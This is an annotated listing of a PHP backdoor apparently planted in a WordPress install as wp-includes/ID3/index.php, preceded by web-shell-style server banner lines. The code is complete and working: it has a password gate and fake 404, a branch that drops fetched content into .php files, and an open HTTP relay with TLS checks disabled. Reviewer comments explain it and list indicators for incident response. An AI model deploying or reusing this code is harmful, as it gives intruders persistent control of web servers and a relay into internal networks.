HEX
Server: Apache/2.4.29 (Ubuntu)
System: Linux bareserver 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User: root (0)
PHP: 7.2.24-0ubuntu0.18.04.17
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,
File: /var/www/html/site/newsiteanterior/wp-includes/ID3/index.php
<?php
// NOTE(review): this script reads as a password-gated backdoor, not application
// code. Past the gate it does two things: `cb` writes fetched content into a
// .php file, and `url` relays an HTTP request through this server and echoes
// the response. Every input comes from $_REQUEST, i.e. query-string or POST
// values (and cookies, if request_order includes them).
// The listing places the file at wp-includes/ID3/index.php; stock WordPress
// does not appear to ship an index.php there -- confirm against core checksums
// (e.g. `wp core verify-checksums`).
// Triage: treat the host as compromised, preserve this file and the web-server
// access logs before cleanup, and search for the dropped files named below.

// Unauthenticated probe: any request carrying `ex` gets the body "1" before the
// password check runs. Presumably a liveness check for whoever planted the file.
if(isset($_REQUEST['ex'])){
    exit('1');
}

// No `pw` at all: answer 404 with an empty body, so a crawler or scanner that
// requests the path sees what looks like a missing page.
if(!isset($_REQUEST['pw'])){
    http_response_code(404);
	exit();
}

// Access gate: MD5 of `pw` compared (loosely, with !=) to a hard-coded digest.
// The digest is a stable string to search for across the web root and backups
// when hunting for other copies of this script.
if(md5($_REQUEST['pw'])!='ffc52a7aef7b90a27c1fbaec516a4f0e'){
    exit('pw error');
}

// Dropper branch: `cb` is base64-decoded and passed to file_get_contents(), so
// the content source is whatever path or URL the requester names. The result is
// written to text.php or dropdown.php (picked at random) via a relative path,
// and the public URL of that file is returned in the response body.
// Both calls are prefixed with @, so failures leave no PHP warning in the logs.
// Detection: unexpected text.php / dropdown.php beside this script, and access
// log entries for this path followed by requests to either name.
if(isset($_REQUEST['cb'])){
    $cb = @file_get_contents(base64_decode($_REQUEST['cb']));
    $file_name_arr = ['text.php','dropdown.php'];
    $fid = rand(0,count($file_name_arr)-1);
    @file_put_contents($file_name_arr[$fid],$cb);
    $self = $_SERVER['PHP_SELF'];
    $self_arr = explode('/',$self);            
    // Swap this script's own file name in PHP_SELF for the dropped file's name;
    // this assumes the relative write above landed in the script's directory.
    $cb_url = $_SERVER['REQUEST_SCHEME'].'://'.$_SERVER['HTTP_HOST'].str_replace($self_arr[count($self_arr)-1],$file_name_arr[$fid],$self);
    exit($cb_url);
}

// Relay branch: everything below turns the server into an HTTP fetcher for the
// requester. `url` is mandatory from here on.
if(!isset($_REQUEST['url'])){    
    exit('no url');
}

// Destination is fully requester-controlled; nothing validates or restricts it.
$url=base64_decode($_REQUEST['url']);

// Outbound request headers, each optionally supplied base64-encoded by the
// requester: al -> Accept-Language, ua -> User-Agent, ck -> cookie.
$param = array();
if(isset($_REQUEST['al'])){
    $param[] = "Accept-Language:".base64_decode($_REQUEST['al']);
}else{
    //$param[] = "Accept-Language:ja, en-GB; q=0.7,en; q=0.3";
}

// Without `ua` the request goes out with a fixed desktop-browser User-Agent;
// that exact string is a usable indicator in egress proxy logs.
if(isset($_REQUEST['ua'])){
    $param[] = "User-Agent:".base64_decode($_REQUEST['ua']);
}else{
    $param[] = "User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/18.17763";
}

if(isset($_REQUEST['ck'])){
    $param[] = "cookie:".base64_decode($_REQUEST['ck']);
}

// The fetched body is echoed verbatim and the response always ends with the
// literal marker "<-- end -->", which can serve as a response-body signature.
// Outbound connections from the web-server process that correlate with hits on
// this path are the network-side trace of this branch.
echo get($url,$param);
exit("<-- end -->");


/**
 * Fetch $url with cURL from this server and return the response body.
 *
 * NOTE(review): this is the transport for the relay branch of the script. The
 * destination and the request headers are both caller-supplied and nothing
 * here restricts scheme, host or port, so the request can reach whatever the
 * web server itself can reach, including internal-only addresses.
 *
 * @param string $url   Destination, passed straight to CURLOPT_URL.
 * @param array  $param Raw header lines, passed straight to CURLOPT_HTTPHEADER.
 * @return string|bool  Response body, or false when curl_exec() fails; the
 *                      failure is not checked or logged.
 */
function get($url, $param) {    
    $curl = curl_init();
    curl_setopt($curl, CURLOPT_URL, $url);
    // Return only the body: response headers are left out of the output.
    curl_setopt($curl, CURLOPT_HEADER, 0);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    // TLS certificate and host-name verification are both switched off, so the
    // fetch succeeds against any certificate.
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
    curl_setopt($curl, CURLOPT_HTTPHEADER, $param);
    // No timeout option is set before executing the request.
    $data = curl_exec($curl);
    curl_close($curl);
    return $data;
} 
?>